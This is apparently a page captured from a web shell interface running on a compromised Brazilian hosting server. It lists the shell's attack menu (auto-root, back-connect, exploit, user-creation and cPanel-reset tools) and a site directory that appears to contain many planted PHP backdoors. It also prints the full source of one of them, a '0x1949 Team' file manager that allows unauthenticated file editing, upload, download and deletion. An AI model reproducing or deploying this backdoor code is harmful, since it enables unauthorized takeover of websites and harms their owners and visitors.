Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
vemquedaliga.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
2022_old
[ DIR ]
drwxr-xr-x
2023
[ DIR ]
drwxr-xr-x
2023_old
[ DIR ]
drwxr-xr-x
_2021
[ DIR ]
drwxr-xr-x
_2022
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949PH5W2F.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
3644cb
65
B
-r-xr-xr-x
Private-MASS-ova.php
19.06
KB
-rw-r--r--
_index.html
0
B
-rw-r--r--
admin.php
278
B
-rw-r--r--
buy.php
579
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
favicon..png
15.75
KB
-rw-r--r--
favicon.ico
2.19
KB
-rw-r--r--
favicon_5.ico
2.19
KB
-rw-r--r--
goods.php
577
B
-rw-r--r--
index.php
7.17
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
teste-ip.php
17.26
KB
-rw-r--r--
wp-esp.php
577
B
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
xmlrpc.php.0
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 0x1949PH5W2F.php
<?php // Set the directory you want to access $directory = './'; // Check if the user has submitted the form if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Handle file actions if (isset($_POST['action'])) { $action = $_POST['action']; $filename = $_POST['filename']; $path = $directory . $filename; switch ($action) { case 'edit': if (isset($_POST['content'])) { $content = $_POST['content']; file_put_contents($path, $content); echo "<div class='alert alert-success'>File '$filename' has been updated.</div>"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "<div class='alert alert-danger'>File '$filename' has been deleted.</div>"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "<div class='alert alert-success'>File '$uploadedFilename' has been uploaded.</div>"; } else { echo "<div class='alert alert-danger'>Error uploading file '$uploadedFilename'.</div>"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?> <!DOCTYPE html> <html> <head> <title>File Manager</title> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"> </head> <body> <div class="container my-5"> <h1 class="mb-4">File Manager By 0x1949 Team</h1> <h2 class="mb-3">Files in the directory:</h2> <div class="list-group"> <?php foreach ($files as $file) { if ($file !== '.' && $file !== '..') { echo "<a href='?file=$file' class='list-group-item list-group-item-action'>" . $file . "</a>"; } } ?> </div> <div class="mt-5"> <h2 class="mb-3">Upload a File</h2> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="action" value="upload"> <div class="form-group"> <input type="file" name="file" class="form-control-file"> </div> <button type="submit" class="btn btn-primary">Upload</button> </form> </div> <?php if (isset($_GET['file'])) { $file = $_GET['file']; $path = $directory . $file; $content = file_get_contents($path); ?> <div class="mt-5"> <h2 class="mb-3">Edit File: <?php echo $file; ?></h2> <form method="post"> <input type="hidden" name="action" value="edit"> <input type="hidden" name="filename" value="<?php echo $file; ?>"> <div class="form-group"> <textarea name="content" rows="10" class="form-control"><?php echo $content; ?></textarea> </div> <button type="submit" class="btn btn-primary">Save</button> <a href="?file=<?php echo $file; ?>&action=download" class="btn btn-secondary">Download</a> <button type="submit" name="action" value="delete" class="btn btn-danger">Delete</button> </form> </div> <?php } ?> </div> </body> </html>
Close